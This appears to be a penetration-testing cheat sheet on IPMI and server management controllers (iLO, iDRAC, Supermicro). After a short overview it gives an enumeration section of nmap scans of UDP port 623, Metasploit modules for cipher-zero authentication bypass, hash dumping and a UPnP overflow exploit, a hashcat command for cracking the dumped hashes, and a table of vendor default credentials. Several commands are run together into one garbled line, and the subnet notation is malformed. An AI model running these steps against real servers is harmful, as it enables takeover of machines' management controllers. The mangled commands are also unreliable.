The IPMI protocol, introduced by Intel in 1998, is now supported by over 200 system vendors, including Cisco, Dell, HP, Supermicro, and more.
Table of Contents
Systems utilizing IPMI version 2.0 can be managed via serial over LAN, allowing sysadmins to view serial console output in-band.
IPMI Uses
- Before the OS has booted to modify BIOS settings
- When the host is fully powered down
- Access to a host after a system failure
IPMI Functions
- Baseboard Management Controller (BMC) – A micro-controller and essential component of an IPMI
- Intelligent Chassis Management Bus (ICMB) – An interface that permits communication from one chassis to another
- Intelligent Platform Management Bus (IPMB) – extends the BMC
- IPMI Memory – stores things such as the system event log, repository store data, and more
- Communications Interfaces – local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus
IPMI Components
Many Baseboard Management Controllers (BMCs), including popular options like HP Integrated Lights-Out (iLO), Dell Remote Access Controller (DRAC), and Supermicro Intelligent Platform Management Interface (IPMI), provide a web-based management console that allows administrators to remotely manage and monitor servers.
These BMCs not only offer an intuitive web interface but also support command-line remote access protocols such as Telnet or SSH for more advanced management tasks.
Additionally, they make use of port 623 UDP for the IPMI network protocol to facilitate seamless and secure communication between the management console and server hardware.
This combination of web-based and command-line tools provides IT professionals with the flexibility and control needed to maintain server health, perform updates, and troubleshoot issues efficiently.
IPMI Enumeration
nmap -n -p 623 10.10.0./24
nmap -n-sU -p 623 10.10.0./24 use auxiliary/scanner/ipmi/ipmi_versionuse auxiliary/scanner/ipmi/ipmi_versionuse auxiliary/scanner/ipmi/ipmi_cipher_zeromsf > use auxiliary/scanner/ipmi/ipmi_dumphashesmsf> use exploit/multi/upnp/libupnp_ssdp_overflowhashcat -m 7300 HASH_admin.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?uBrute Force
Only HP randomizes the password during the manufacturing process.
| Product Name | Default Username | Default Password |
| HP Integrated Lights Out (iLO) | Administrator | <factory randomized 8-character string> |
| Dell Remote Access Card (iDRAC, DRAC) | root | calvin |
| IBM Integrated Management Module (IMM) | USERID | PASSW0RD (with a zero) |
| Fujitsu Integrated Remote Management Controller | admin | admin |
| Supermicro IPMI (2.0) | ADMIN | ADMIN |
| Oracle/Sun Integrated Lights Out Manager (ILOM) | root | changeme |
| ASUS iKVM BMC | admin | admin |
Comments